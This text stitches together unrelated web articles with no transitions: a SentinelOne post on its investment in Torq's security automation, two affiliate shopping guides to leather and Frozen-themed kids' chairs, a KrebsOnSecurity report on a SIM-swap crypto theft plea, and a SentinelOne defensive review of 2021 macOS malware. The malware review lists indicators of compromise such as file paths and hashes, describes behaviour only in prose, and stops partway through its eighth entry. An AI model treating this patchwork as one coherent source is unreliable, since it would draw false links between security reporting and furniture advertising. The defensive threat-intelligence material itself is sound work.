Reducing Human Effort in Cybersecurity | Why We Are Investing in Torq’s Automation Platform

At SentinelOne, we were delighted to play our part in helping Torq raise $50m in its Series B funding last week. We believe Torq’s no-coding approach to automation will facilitate more complex workflows to respond to threats and play an essential role in developing XDR. Torq is on a mission to reinvent automation for security teams, a mission we at SentinelOne fully support. The importance of automation – of taking human effort out of the security equation – is central to our philosophy.

What is Torq?

Torq is a platform built around world-class automation, best practices templates, connectivity, and data tools. Torq aims to let security professionals connect to any security system needed and easily build automated workflows with a no-code approach.

Automation helps teams do more with limited resources, spend more time on the most valuable work, increase productivity, and leads to less burnout and better team retention.

Torq and the SentinelOne Platform

SentinelOne customers will find a variety of use-cases for Torq, including:

  • Supercharge Your Threat Hunting – create automated workflows to look for specific indicators across a fleet of SentinelOne-protected-endpoints, allowing teams either to efficiently investigate the devices where they are found or automate adding items to block lists.
  • Enrich Your Threat Intelligence – for every threat discovered on a SentinelOne-protected endpoint, automate additional analyses, update results within the SentinelOne platform and add automated notes.

More generally, security teams can add Torq workflows for

  • Responding to Suspicious User Activity – when detected, send a verification to the user via Slack. Either allow the action (if the user verifies) or quarantine the account or endpoint if not.
  • Remediating CSPM – automatically remediate simple issues, route alerts to multiple teams for fixes, create ‘recommended action’ buttons in Jira, Slack, and other systems
  • Easily onboarding/offboarding – orchestrate policy updates across all systems and automatically trigger flows. Require approvals for granting/removing sensitive permissions.

Why We’re Excited to See Torq Succeed

Decoupling automation and remediation from SOAR and enabling integration with agnostic data sources to facilitate more complex workflows to respond or even assert a proactive posture against threats is one of the keys to an open XDR offering. Torq’s no-code approach delivers on this vision and provides an approachable visual and declarative means of authoring automation for security experts and novices, which is critical given the deficit in security professionals in our field.

We commend Torq for building a top-notch engineering team that delivers a simple, intuitive user experience that abstracts a very robust and well-thought-out platform. We are very excited to partner with the Torq team.

If you’d like to learn more about SentinelOne and Torq, contact us or request a free demo.

Is A Leather Chair Suitable For Kids?

Parents looking for stylish kids’ furniture that is both comfortable and affordable may want to consider the many benefits of leather chairs. Leather chair lounge designs have been around since ancient times, but they have become more modernized with time. In addition to being classy and quite comfortable, quality leather children’s furniture can be a great investment.

Regardless of the reasons for seeking new kids’ furniture, leather lounge chairs are an excellent choice. They are not only comfortable, but they come in many different colors and designs to satisfy your child’s personal taste. Leather lounge chairs for kids can look great in any bedroom or playroom and provide comfort and function.
If you want to make a statement, leather chair designs will do it for you.

There are a few things to consider when purchasing leather chairs for kids:

  • The age of your child. Depending on their size, a leather chair may be too big or too small for them. It is important to find furniture that is both comfortable and manageable for your child to use.
  • Additionally, you will want to take into consideration their specific tastes. Some children want certain styles, while others prefer a more neutral style that would go with any décor.
  • Sustainability and eco-friendliness are other factors that should be considered when purchasing any type of furniture, but it is essential when purchasing items for kids. You want to make sure that neither you nor your little one has an issue with animal rights.

Faux leather chairs for kids – is it an alternative for kids’ leather chairs?

Leather as a material has a lot of benefits. It is not only comfortable, but it can last long and also adds a luxurious look to your house. Kids’ furniture made of leather is no exception. However, many feel that animal-based materials are cruel. Therefore, kids’ faux leather chairs have become very popular in today’s marketplace.

If you’re looking for a more affordable, animal-friendly option, faux leather chairs for kids may be the right choice for you. Faux leather is made from synthetic materials that look and feel like genuine leather. This makes it an excellent alternative for parents who want the look and feel of leather furniture but don’t want to harm any animals.

Faux leather chairs come in various colors and designs so that you can find the perfect one for your child’s bedroom or playroom. They are also very affordable, making them a great choice for parents on a budget.

Like leather furniture, it is important to consider your child’s age and taste when choosing faux leather chairs. Be sure to buy one that is the right size for your little one and one that they will be comfortable sitting in.

If you’re looking for a stylish, affordable addition to your child’s bedroom or playroom, faux leather kids’ chairs are an excellent choice!

Best Kids’ Faux Leather Chairs – Your Children Will Love Them

If you’re shopping for a lower-priced but high-quality kids’ chair, you will want to consider the kids’ faux leather chairs available from Amazon.com. We have gathered five of the best-selling and highest-rated faux leather chairs for kids on Amazon, so you can be sure your child will love their new chair.

Baby Care Leather Kids Sofa

The Baby Care Leather Kids Sofa is the perfect size for toddlers. It provides a comfortable and cozy place for your little one to relax. They will love crawling into this soft, faux leather chair to read their favorite book or watch cartoons.

The Baby Care Leather Kids Sofa is made of soffkin fabric, a type of synthetic leather. This makes it a durable and easy-to-clean chair. It is also waterproof and has antibacterial properties, making it a safe choice for kids.

The Baby Care Leather Kids Sofa receives 5 stars out of 5 on Amazon from over 100 reviews. Parents love the durable and waterproof material that this chair is made with. They also like how comfortable it is and rave about their children loving to sit in it.

Melissa & Doug Brown Coffee Faux Leather Child’s Armchair

The Melissa & Doug Child’s Armchair is a pleasant and well-made chair for toddlers and preschoolers. The faux leather kids’ chair comes in five colors: coffee, brown faux leather, denim, and pink. It is also an Amazon Exclusive, so you can only buy it there.

This kids’ armchair accommodates children aged three years and up, providing them the ideal cozy location to snuggle with their favorite toy, book, game, or activity. It can support a weight of up to 100 pounds.

The Melissa & Doug Brown Coffee Faux Leather Child’s Armchair receives 4.8 stars out of 5 on Amazon from over 500 reviews. Parents love how sturdy this chair is and how well the faux leather material holds up against their children’s wear and tear.

Amazon Basics Faux Leather Kids/Youth Recliner with Armrest Storage

The AmazonBasics Faux Leather Kids/Youth Recliner with Armrest Storage is perfect for children aged 3 and up. It has a weight capacity of 90 pounds and reclines all the way back. It is a perfect mini version of the recliner for adults! This makes it ideal for taking a quick nap or just relaxing after a long day of play.

The faux leather upholstery is easy to clean, and the chair comes in a variety of adorable colors, including brown, pink, and beige.

Armrests of this kids’ recliner hide storage compartment for books, video game controllers, remotes, and more.
The AmazonBasics Faux Leather Kids/Youth Recliner with Armrest Storage receives 4.7 stars out of 5 on Amazon from over 1,500 reviews. Parents love the reclining function and color selection of this chair, as well as the storage compartments on the armrests. They also find that it is a very comfortable chair for their kids to relax. It is also a good value for money!

Flash Furniture Contemporary Brown LeatherSoft Kids Recliner with Cup Holder and Headrest

This easy recliner provides the comfort that grown-ups enjoy, making it ideal for small children. Your child will be entertained knowing they may sit in this push-back recliner while the family gathers in the living room to watch TV and movies.

The chair can support up to 90 pounds and has a safety mechanism that works as follows: as soon as the kid is in a seated position and the ottoman is pulled out one inch, the seat will recline. This child-sized recliner will look fantastic in your living room, bedroom, or playroom.

The LeatherSoft upholstery is resilient enough to withstand active children, making cleanup a breeze. With an enormous headrest, solid hardwood structure, and a cup holder in the arm to keep their favorite drink, you’ll have no trouble selecting this item.

Flash Furniture Contemporary Brown LeatherSoft Kids Recliner comes in a variety of different colors and has a 4.7-star rating on Amazon with over 8000 reviews! Parents love this chair for its sturdy build, comfortable design, and easy to clean fabric.

As you can see, there are many different types of chairs that are perfect for kids. No matter what your child’s personality or interests may be, you will be able to find a chair that suits them. You can even get matching furniture for the whole family!

Happy shopping and enjoy your new chair!

The post Is A Leather Chair Suitable For Kids? appeared first on Comfy Bummy.

NY Man Pleads Guilty in $20 Million SIM Swap Theft

A 24-year-old New York man who bragged about helping to steal more than $20 million worth of cryptocurrency from a technology executive has pleaded guilty to conspiracy to commit wire fraud. Nicholas Truglia was part of a group alleged to have stolen more than $100 million from cryptocurrency investors using fraudulent “SIM swaps,” scams in which identity thieves hijack a target’s mobile phone number and use that to wrest control over the victim’s online identities.

Truglia admitted to a New York federal court that he let a friend use his account at crypto-trading platform Binance in 2018 to launder more than $20 million worth of virtual currency stolen from Michael Terpin, a cryptocurrency investor who co-founded the first angel investor group for bitcoin enthusiasts.

Following the theft, Terpin filed a civil lawsuit against Truglia with the Los Angeles Superior court. In May 2019, the jury awarded Terpin a $75.8 million judgment against Truglia. In January 2020, a New York grand jury criminally indicted Truglia (PDF) for his part in the crypto theft from Terpin.

A SIM card is the tiny, removable chip in a mobile device that allows it to connect to the provider’s network. Customers can legitimately request a SIM swap when their mobile device has been damaged or lost, or when they are switching to a different phone that requires a SIM card of another size.

Nicholas Truglia, holding bottle. Image: twitter.com/erupts

But fraudulent SIM swaps are frequently abused by scam artists who trick mobile providers into tying a target’s service to a new SIM card and mobile phone controlled by the scammers. Unauthorized SIM swaps often are perpetrated by fraudsters who have already stolen or phished a target’s password, as many financial institutions and online services rely on text messages to send users a one-time code for multi-factor authentication.

Compounding the threat, many websites let customers reset their passwords merely by clicking a link sent via SMS to the mobile phone number tied to the account, meaning anyone who controls that phone number can reset the passwords for those accounts.

Reached for comment, Terpin said his assailant got off easy.

“I am outraged that after nearly four years and hundreds of pages of evidence that the best the prosecutors could recommend was a plea bargain for a single, relatively minor count of the unauthorized use of a Binance exchange account, when all the evidence points toward Truglia being one of two masterminds of a wide-ranging criminal conspiracy to steal crypto from me and others,” Terpin told KrebsOnSecurity.

Terpin said public court records already show Truglia bragging about stealing his funds and using it to finance a lavish lifestyle.

“He at the very least withdrew 100 bitcoin (worth $1.6 million at the time and nearly $5 million today) from my theft into his wallet at a separate, US-based exchange, and then moved or spent it,” Terpin said. “The fact is that the intentional theft of $24 million, whether taken at the point of a gun in a bank or through a SIM card swap, is a major felony. Truglia should be prosecuted to the fullest extent of the law.”

Nicholas Truglia, showing off a diamond-studded Piaget watch while aboard a private jet. Image: twitter.com/erupts.

Terpin also is waging an ongoing civil lawsuit against 18-year-old Ellis Pinsky, who’s accused of working with Truglia as part of a SIM swapping crew that has stolen more than $100 million in cryptocurrency. According to Terpin, Pinsky was 15 when he took part in the $24 million 2018 SIM swap, but he returned $2 million worth of cryptocurrency after being confronted by Terpin’s investigators.

“On the surface, Pinsky is an ‘All American Boy,’” Terpin’s civil suit charges. “The son of privilege, he is active in extracurricular activities and lives a suburban life with a doting mother who is a prominent doctor.”

“Despite their wholesome appearances, Pinsky and his other cohorts are in fact evil computer geniuses with sociopathic traits who heartlessly ruin their innocent victims’ lives and gleefully boast of their multi-million-dollar heists,” the lawsuit continues. “Pinsky is reputed to have used his ill-gotten gains to purchase multi-million-dollar watches and is known to go on nightclub sprees at high end clubs in New York City, and Truglia rented private jets and played the part of a dashing playboy with young women pampering him.”

Pinksy could not be immediately reached for comment. But a review of the latest filings in the lawsuit show that Pinsky’s attorneys stopped representing him because he no longer had the funds to pay for their services. The most recent entry in the New York Southern District’s docket asks the court to give Pinsky additional time to seek counsel, and hints that barring that he may end up representing himself.

Ellis Pinsky, in a photo uploaded to his social media profile.

Truglia is still being criminally prosecuted in Santa Clara, Calif., the home of the REACT task force, which pursues SIM-swapping cases nationwide. In November 2018, REACT investigators and New York authorities arrested Truglia on suspicion of using SIM swaps to steal approximately $1 million worth of cryptocurrencies from Robert Ross, a San Francisco father of two who later went on to found the victim advocacy website stopsimcrime.org.

According to published reports, Truglia and his accomplices also perpetrated SIM swaps against the CEO of the blockchain storage service 0Chain; hedge-funder Myles Danielson, vice president of Hall Capital Partners; and Gabrielle Katsnelson, the co-founder of the startup SMBX.

Truglia is currently slated to be sentenced in April 2022 for his guilty plea in New York. He faces a maximum sentence of up to 20 years in prison.

Erin West, deputy district attorney for Santa Clara County, told KrebsOnSecurity that SIM swapping remains a major problem. But she said many of the victims they’re now assisting are relatively new cryptocurrency investors for whom a SIM swapping attack can be financially devastating.

“Originally, the SIM swap targets were the early adopters of crypto,” West said. “Now we’re seeing a lot more of what I would call normal people trying their hand at crypto, and that makes a lot more people a target. It makes people who are unfamiliar with their personal security online vulnerable to hackers whose entire job is to figure out how to part people from their money.”

West said REACT continues to train state and local law enforcement officials across the country on how to successfully investigate and prosecute SIM swapping cases.

“The good news is our partners across the nation are learning how to conduct these cases,” she said. “Where this was a relatively new phenomenon three years ago, other smaller jurisdictions around the country are now learning how to prosecute this crime.”

All of the major wireless carriers let customers add security against SIM swaps and related schemes by setting a PIN that needs to be provided over the phone or in person at a store before account changes should be made. But these security features can be bypassed by incompetent or corrupt mobile store employees.

For some tips on how to minimize your chances of becoming the next SIM swapping victim, check out the “What Can You Do?” section at the conclusion of this story.

The best Frozen kids chairs for Disney fans

Disney Frozen is probably the most popular animated movie of the last couple of years. It has conquered millions of hearts and turned little girls everywhere into true fans eager to see anything and everything that had something to do with their beloved characters: Anna and Elsa. Well, we have great news for all of you Frozen fans out there!

We’ve done some research and found the best Frozen kids chairs for you to buy. Not only are they super exciting and fun, but they are also durable enough to hold the weight of your little princess (or prince) for years.

Take a look at some of the best Frozen kids chairs currently available:

Delta Children Upholstered Chair, Disney Frozen

It is no surprise that Delta Children’s kids’ chairs lead our list. The company is widely known for its attention to detail and quality of products. This specific one is no exception. It has a pretty straightforward design, but it looks super cute.

The polyester fabric of the chair backs promises durability while still being soft enough to be comfortable for your kids. The characters on the chair will keep your child entertained for hours on end, and the high-back design provides excellent support – perfect for those long movie nights. The chair is recommended for kids aged 3 and older, but it can hold weights of up to 100 pounds.

This chair is available in two different designs:

Price varies depending on chosen design – Frozen kids’ chair from Delta Children can cost between $65 and $95 on Amazon, which might seem like a lot for some of you; however, we believe this is one of the best Frozen kids chairs out there!

Delta Children Figural Upholstered Kids Chair, Disney Frozen II

We just can’t get enough of Delta Children’s products, and this Figural Upholstered Kids Chair is definitely one of our favorites. It features a bit different design to the ones previously mentioned, as it sports a high-quality image of Elsa or Anna on the chair back. This gives the chair a unique look, and your child will definitely feel like a true Disney Frozen fan when sitting in it.

Like the other Delta Children’s chair, this one is also made out of polyester fabric that is not only soft but also durable. It is designed for children 3 years and up and can hold up to 100 pounds.

Check the retail price of the chair on Amazon by clicking at the name of the preferred Frozen character:

  • Elsa – Frozen II Delta Children Figural Upholstered Kids Chair
  • Anna – Frozen II Delta Children Figural Upholstered Kids Chair

Idea Nuova Frozen 2 Swivel Mesh Rolling Desk Chair

Having a good desk chair is crucial for all kids, especially those who love spending time doing homework or playing games in their room. This Idea Nuova Frozen 2 Swivel Mesh Rolling Desk Chair is perfect for all of you Frozen fans out there! It has a cool and modern design, featuring an image of Anna and Elsa on the back.

The chair is made out of high-quality mesh and plastic materials, making it both durable and lightweight. It also features a 360-degree swivel base, so your child can easily rotate to face the TV or desk. The chair can hold up to 225 pounds, making it perfect for both younger and older kids. The easy-to-use lever and pneumatic mechanism on this swivel workplace chair allow you to change its height to your desired level. The mesh cushioned seat is pleasant and straightforward to maintain. The curved mesh back provides support and comfort for the back.

Idea Nuova Frozen 2 Saucer Chair

A saucer chair is an original addition to any Frozen fan’s bedroom or playroom. This Idea Nuova Frozen 2 Saucer Chair is made out of high-quality and durable materials, featuring a beautiful image of Frozen trio: Anna and Elsa and Olaf on the back. It is perfect for kids who love to lounge around and watch TV, read books, or play games.

The saucer chair is made of a sturdy metal frame and soft and comfortable fabric. It can hold up to 80 pounds, making it perfect for both younger and older kids. The metal frame has a safety locking mechanism to keep the chair sturdy and in place. The Saucer Chair also features LED lights.

The saucer chair features a foldable design that makes it easy to store when not in use. It folds flat for simple, space-saving transportation and storage. This saucer chair won’t take up much room, making it a great purchase.

Kids’ Frozen chairs – bean bags

Bean bags are truly a timeless classic, and they can be just as stylish as the most fashionable chairs. If your kid loves to sit back and relax with a good book or watch TV, then a bean bag is the perfect addition to their room!
Several bean bags featuring Frozen characters are available on the market, and we’ve chosen our favorites for you:

Disney Frozen Cozee Fluffy Chair by Delta Children

This soft and fluffy chair is perfect for all Frozen fans out there. It is made out of high-quality materials, featuring an image of Anna and Elsa on the front. The chair is designed for children aged 2-6 years old and can hold up to 60 pounds.

It provides greater comfort and support than traditional bean bag chairs since it is stuffed with shredded foam that shapes to your child’s body. The soft faux fur cover and supportive back ensure that youngsters have an oh-so-comfortable place of their own, and its lightweight construction means it can be taken anywhere your child goes. Side pockets on this chair are perfect for storing toys, books, or movie snacks.

As a bonus, the chair’s non-slip bottom keeps it in place. It’s the ideal piece of furniture for your playroom, bedroom, or living room.

Idea Nuova Disney Frozen 2 Elsa Figural Bean Bag Chair with Sherpa Trim

This Elsa Frozen Figural Bean Bag Chair is perfect for all of your favorite little Frozen fans. The bean bag is made out of soft and durable fabric, featuring a beautiful image of Elsa on the front. It is perfect for kids who love to lounge around and watch TV, read books, or play games.

This iconic chair is a must-have for all Frozen fans, thanks to its printed image of Elsa, which is studded with winter wonderland snowflakes. The chair has Sherpa piping on the seat and arms for added warmth and comfort. It is designed for children aged 2-5 years old.

It’s a great gift idea, especially during the colder months of the year. The soft plush fabrics ensure that your child will have a cozy place to relax after a long day of playing outside.

Idea Nuova Disney Frozen Figural Bean Bag Chair

The most classic bean bag chair on this list. This fantastic round figural kid’s bean bag chair from Frozen fans will enjoy! You can’t go wrong with this adorable Frozen decorative bean bag, which features a broderie of the famous character Elsa. Excellent addition to any space and a must-have in every child’s room.

This bean bag chair is made of polyester fabric and is sturdy and long-lasting. This bean bag chair can support up to 81 pounds. This bean bag chair is also relatively small, making it perfect for younger children. Plus, it is convenient to take it with you for movie nights at your friend’s or family members’ house.

Idea Nuova Frozen 2 Kids Nylon Bean Bag Chair with Piping & Top Carry Handle with Olaf Graphics

Frozen is not only about Elsa and Anna! This movie would not be the same without Olaf either. Kids can now enjoy their favorite Frozen scenes and characters with this Olaf bean bag chair! It is a perfect addition to any bedroom, living room, playroom, or even classroom. It has a design featuring Olaf’s smiling face on the front, and it is made out of high-quality nylon fabric, which will not fray over time.

The bean bag features a top carry handle for easy transportation from room to room as needed. This bean bag chair can hold up to 60 pounds and has a size of 18” x 18” x 11”. Great for kids aged 2-5 years old.

Bean bag chairs are the perfect gift idea, especially if they are character-themed. They are fun and comfy, so kids will love sitting on them watching TV, reading books, or playing games. All of these bean bags can be purchased on Amazon.

Frozen kids’ camping chairs for those Northern Adventures!

What’s a better way to enjoy the great outdoors than with an adventure inspired by Frozen? These chairs are perfect for your little ones who want to join in on all the fun! The chairs are made of durable and lightweight materials so that they can be easily transported from one spot to another. They are also comfortable, thanks to the padded seats and armrests, which provide better back support. The chairs can fold flat and include straps for easier transport. With these chairs, you can turn any outdoor event into something Frozen-tastic!

The Frozen-themed kids’ camping chairs from Jakks Pacific caught our attention. Jakks Pacific is a well-known toy and collectibles manufacturer that collaborates with some of the biggest licensors in the entertainment industry. Their Frozen camping chairs are officially licensed Disney products.

The chairs are designed for children aged 3 and up. They are made of polyester and have a weight limit of 100 pounds. The dimensions of the chairs are 21.5″D x 12.9″W x 20.38″H and weigh under 3 pounds each.

Frozen-themed activity furniture for the kids’ playroom

There are tons of Frozen toys available, but how about some furniture? These activity tables are perfect for the Frozen-themed playroom!

Delta Children Kids Table and Chair Set

Frozen theme kids table in Delta children collection This activity table has a cute Frozen-themed design. The table and chairs are made of solid and durable wood, and they can be easily cleaned. The chairs can hold up to 50 pounds each.

The Frozen activity table is perfect for arts and crafts, snacks, or homework time. It would also be great for playing games or just reading a book. The table includes a storage bin where kids can keep all their art supplies.

The table and chairs set are ideal for children aged 2-6 years old. Kids won’t want to stop playing with them! They will be having so much fun!

Delta Children Kids Convertible Activity Bench, Disney Frozen II

It’s a must-have for any growing youngster. It has a 3-in-1 design that instantly transforms from a storage bench to a desk, allowing your child to transition between playtime and ideal homework conditions in seconds!

This extremely flexible workstation also includes two fabric bins beneath, making it the ideal location for kids to store their toys, books, or art materials. This durable activity bench can be used by children aged 3-7.

Idea Nuova Disney Frozen II 3 Piece Collapsible Set with Storage Table and 2 Ottomans

Give your children a place to sit and a place to store their belongings! The 3 Piece Storage Table and Ottoman Set is the ideal method to keep clutter at bay while still providing a location for your child to do everything from painting to eating supper. Table and ottomans are collapsible in design for easy storage when not in use.

Table and bench duet provides hours of playtime fun while doubling as a clean surface for snack time, crafts, and more.

How is Frozen so popular?

Quite simply, Frozen is popular because it is an excellent movie. It has a great story, lovable characters, beautiful animation, and catchy songs. But beyond that, Frozen has resonated with people on a deeper level.

Some say that Frozen speaks to the universal experience of being ostracized or feeling different. Elsa, the Snow Queen, has to hide her magical powers for fear of being rejected by society. This storyline is something that a lot of people can relate to.

Additionally, Frozen addresses important topics like love, sisterhood, and self-acceptance in a meaningful and entertaining way. This is why Frozen has become such a phenomenon and is sure to be a favorite for many years to come.

The post The best Frozen kids chairs for Disney fans appeared first on Comfy Bummy.

Top 10 macOS Malware Discoveries in 2021 | A Guide To Prevention & Detection

As we approach the end of 2021, we take a look at the year’s main malware discoveries targeting the macOS platform with an emphasis on highlighting the changing tactics, techniques and procedures being employed by threat actors. In particular, we hone in on what is unique about each malware discovery, who it targets and what its objectives are.

On top of that, you’ll find a breakdown of the essential behavior of each threat and links to deeper technical analyses. At the end of the post, we draw out the main lessons Mac admins and security teams can learn from this year’s crop of macOS malware to help them better protect their Mac fleets going into 2022.

Summary of Key Trends Emerging During 2021

As we will describe below, several things stand out about macOS malware in 2021. These include:

  • macOS targeted in more cross-platform malware campaigns, with malware written in Go, Kotlin and Python observed
  • A drive towards attacks on developers and other ‘high-value’ targets
  • An increasing interest in targeting macOS users in the East (China and Asia)
  • A continued reliance on using LaunchAgents as the primary persistence mechanism
  • While commodity adware is by far the most prevalent threat on macOS, most new malware families that emerged in 2021 focused on espionage and data theft.

In 2021 to-date, there have been ten new reported malware discoveries. Let’s take a look at what was unique for each one and the main points that defenders need to be aware of.

Top 10 In-the-Wild macOS Malware Discoveries 2021

1. ElectroRAT

In January 2021, Intezer reported on Operation ElectroRAT, a campaign that had been running throughout 2020 targeting cryptocurrency users. This was the first of an increasingly common-trend throughout 2021: cross-platform malware written in Go targeting macOS, Linux and Windows operating systems. The aim was to get cryptocurrency users to install a trojanized application for trading and managing cryptocurrency.

All versions were built using Electron, and once the trojan app is installed and launched, a malicious background process called “mdworker” functions as the RAT, capable of keylogging, taking screenshots, executing shell commands, and uploading and downloading files. The name was carefully chosen: “mdworker” is also the name of a legitimate system binary that powers the Mac’s Spotlight search functionality.

The malicious mdworker binary is copied from the trojan bundle and written as a hidden file in the user’s home folder. Persistence is via a property list in the user’s LaunchAgents folder.

Primary IoCs:

~/Library/LaunchAgents/mdworker.plist
~/.mdworker
/Applications/eTrader.app/Contents/Utils/mdworker

Notable Characteristics:

  • Cross-platform RAT malware written in Go
  • Uses trojanized Crypto Trading applications
  • Attempts to hide as a system process (T1564.001)
  • Uses a Launch Agent for persistence (T1543.001)

2. OSAMiner

Also in January, SentinelLabs reported on OSAMiner, part of a campaign that had been in existence in various forms for at least five years and which appears to target primarily Chinese and Asian Mac users by installing a hidden Monero crypto miner.

OSAMiner was novel primarily for its extensive use of multiple, run-only AppleScripts. Due to the difficulty in reversing run-only AppleScripts, this technique helped it to hide its activity. As we shall see below,  this technique (and indeed some of the code) was later copied by XCSSET.

Among other behaviors, the OSAMiner malware sets up a persistence agent and downloads the first stage of the miner by retrieving a URL embedded in a public web page.

OSAMiner persists via LaunchAgents that attempt to evade detection by using labels and file paths containing “com.apple”.

Primary IoCs:

~/Library/11.png
~/Library/k.plist
~/Library/LaunchAgents/com.apple.FY9.plist
~/Library/LaunchAgents/com.apple.HYQ.plist
~/Library/LaunchAgents/com.apple.2KR.plist
~/Library/Caches/com.apple.XX/ssl4.plist (where “XX” is any two uppercase letters)

Notable Characteristics:

  • Cryptominer
  • Uses a complex combination of run-only AppleScripts (T1059.002)
  • Retrieves next-stage URL embedded in a publicly-hosted image
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)

3. Silver Sparrow

First disclosed by researchers at Red Canary, Silver Sparrow was likely intended to function as an adware/PUP delivery mechanism for unscrupulous developers willing to pay the authors for a ‘pay per install’ (PPI) mechanism. As it was, Silver Sparrow’s infrastructure was taken down before any payloads were delivered, but the infection mechanism is an interesting – and hitherto unknown – way to abuse the Installer package that defenders and analysts should be aware of.

Installer packages typically use dedicated preinstall and postinstall shell scripts for preparing and cleaning up software installations, Silver Sparrow takes a different approach and (ab)uses the Distribution file to execute bash commands via the JavaScript API during the installation process.

In the observed instances, this code sets up a persistence agent with the filename pattern init-.plist in ~/Library/LaunchAgents, writes a program executable with the file path pattern: ~/Library/Application Support/_updater/.sh, and attempts to download and execute a payload at /tmp/.

Primary IoCs:

~/Library/Application Support/verx_updater/verx.sh
~/Library/LaunchAgents/init_verx.plist
~/Library/LaunchAgents/verx.plist
~/Library/LaunchAgents/init_agent.plist
~/Library/Application Support/agent_updater

Notable Characteristics:

  • Adware Loader
  • Uses the Distribution file in Apple Package Installer
  • Downloads malware with Bash commands (T1059.004)
  • Uses the JavaScript API (T1059.007)
  • Uses a Launch Agent for persistence (T1543.001)

4. Silver Toucan/WizardUpdate/UpdateAgent

A malware with many names, this Adload dropper was variously co-discovered by Red Canary, Confiant and Microsoft across late February/early March 2021, with Microsoft also tracking changes as recently as October. Early versions of the dropper were distinctive in the way they used curl and Amazon AWS instances to download various second and third stage payloads. Microsoft also noted that UpdateAgent deploys a Gatekeeper bypass, but what particularly caught attention was the way this actor bypassed Apple’s Notarization check and succeeded in getting all their malicious packages notarized.

According to a tweet from Confiant, the trick is deceptively simple: create a benign application in a standard Apple package installer, and use the package’s postinstall script to pull down the malware.

The lesson here is clear: neither Gatekeeper nor Notarization guarantee your downloads are malware free. Seek help from other sources!

Primary IoCs:

/Library/Application Support/Helper/HelperModule
/Library/Application Support/WebVideoPlayer/WebVideoPlayerAgent
/Library/Application Support/McSnip/McSnipAgent
~/Library/Application Support/Quest/QuestBarStatusAgent
~/Library/Application Support/SubVideoTube/SubVideoTubeStatusAgent

Notable Characteristics:

  • Loader platform
  • Uses postinstall script to download payloads (T1059.004)
  • Ingress Tool/File Transfer with CURL (T1105)
  • Makes use of public cloud infrastructure for C2s
  • Malware is Notarized by Apple
  • Malware uses a Gatekeeper bypass

5. XcodeSpy

In March, SentinelLabs reported on what looked very much like a targeted attack on iOS developers using Apple’s Xcode. XcodeSpy, a trojanized Xcode project, was found in the wild targeting iOS developers with an EggShell backdoor. The malicious project was a doctored version of a legitimate, open-source project available on GitHub, which would execute an obfuscated Run Script when the developer’s build target was launched.

The dropped EggShell backdoor is a Mach-O executable able to record information from the victim’s microphone, camera, and keyboard.

While the use of a trojanized Xcode project and obfuscated Run Script is a novel vector that we have not seen before, the malware uses a tried-and-tested persistence technique,  installing a user LaunchAgent for persistence and trying to disguise it as a legitimate Apple file.

Primary IoCs:

~/Library/LaunchAgents/com.apple.usagestatistics.plist 
~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist
~/Library/Application Scripts/com.apple.Preview/.stors
~/Library/Application Scripts/com.apple.TextEdit/.scriptdb
~/Library/Application Support/com.apple.AppStore/.update
/private/tmp/.tag

Notable Characteristics:

  • Backdoor
  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Uses a Mach-O, customized EggShell instance
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)

6. WildPressure

In July, Kaspersky revealed details of another cross-platform Trojan with a macOS component. According to the researchers, WildPresssure is a newly-identified APT operation targeting entities in the Middle East. The macOS component of WildPressure is embedded in a Python file, which itself is executed persistently by a LaunchAgent using com.apple as part of the label name in an effort to blend in with system processes.

The same Python file has some rudimentary AV detection logic.

While Python-based post-exploit kits are common enough on all platforms, this is the first time we have seen APT-level malware on macOS making use of a Python script in the program arguments of a LaunchAgent.

Primary IoCs:

~/Library/LaunchAgents/com.apple.pyapple.plist
~/Library/LaunchAgents/apple.scriptzxy.plist
~/.appdata/grconf.dat

Notable Characteristics:

  • Backdoor
  • Cross-Platform
  • Attempts to hide as a system process (T1564.001)
  • Uses a Launch Agent for persistence (T1543.001)
  • Uses Python for its executable (T1059.006)

7. XLoader

Also first described in July (this time by CheckPoint) and also cross-platform, XLoader is a Malware-as-a-Service info stealer and keylogger. The Mac version of XLoader is unusual in several regards, but primarily because it is Java-based. Finding Java installs on Macs these days is not a common occurrence, and with the exception of  people playing Minecraft or researchers using Ghidra, the most common uses for Java on macOS are Java developers and certain legacy business and banking applications.

XLoader’s executable is a heavily stripped and obfuscated Mach-O dropped in the User’s  Home folder. It also drops a hidden application bundle in the same location containing a copy of itself. It then loads a user LaunchAgent for persistence with the program argument pointing to the hidden app bundle. All file names are randomized and vary from execution to execution. Among other things, XLoader will attempt to steal credentials from Chrome and Firefox browsers.

Detection of XLoader in SentinelOne console

Primary IoCs:

XLoader Mach-O Executable: KIbwf02l
7edead477048b47d2ac3abdc4baef12579c3c348

Suspected Phishing lure attachment: Statement SKBMT 09818.jar
b8c0167341d3639eb1ed2636a56c272dc66546fa

Example Persistence LaunchAgent: com.j85H64iPLnW.rXxHYP
cb3e7ac4e2e83335421f8bbc0cf953cb820e2e27

Notable Characteristics:

  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Requires JRE runtime to be installed on victim machine
  • Uses Mach-O executables
  • Uses a Launch Agent for persistence (T1543.001)
  • Uses random file names unique for each instance
  • Defense evasion via hidden artifacts (T1564.001)

8. XCSSET Updated

XCSSET malware was initially described by Trend Micro last year, in August 2020. However, the malware has undergone quite a lot of development in that time, and by July 2021 there had certainly been enough changes to warrant revisiting it. Like OSAMiner (See Item 2, above), XCSSET makes heavy use of run-only AppleScripts, and both use the same AppleScript code in their string encryption and decryption routines.

AppleScript string decryption routine used in both XCSSET and OSAMiner malware

At one point, Apple linked OSAMiner and XCSSET together in their XProtect signature file, branding them both part of the same family they called “DubRobber”. That link no longer appears in XProtect, but the code sharing is certainly intriguing. Both malware families appear to be targeting primarily Chinese and Asian macOS users, with some suggestions that XCSSET is aimed at Chinese gambling sites and users.

Despite the similarities noted, XCSSET and OSAMiner share little else in common. XCSSET is vastly more complex and makes use of many different components and TTPs that make it difficult for traditional AV software to detect and easy for the authors to adapt. Among those is the use of shc, a publicly available shell script compiler that makes XCSSET Mach-O binaries opaque to static signature scanning engines like XProtect, meaning the only sure way to catch XCSSET is through behavioral detection.

XCSSET also uses other publicly available projects to replace the user’s browser Dock icon with a fake one that launches the malware whenever the user launches their browser from the Dock. The developers of XCSSET have also used zero-days to bypass privacy protections allowing them to take screen captures by hijacking the entitlements of other apps on the system.

Primary IoCs:

~/Library/Caches/GeoServices/.report
~/Library/Caches/GeoServices/.plist
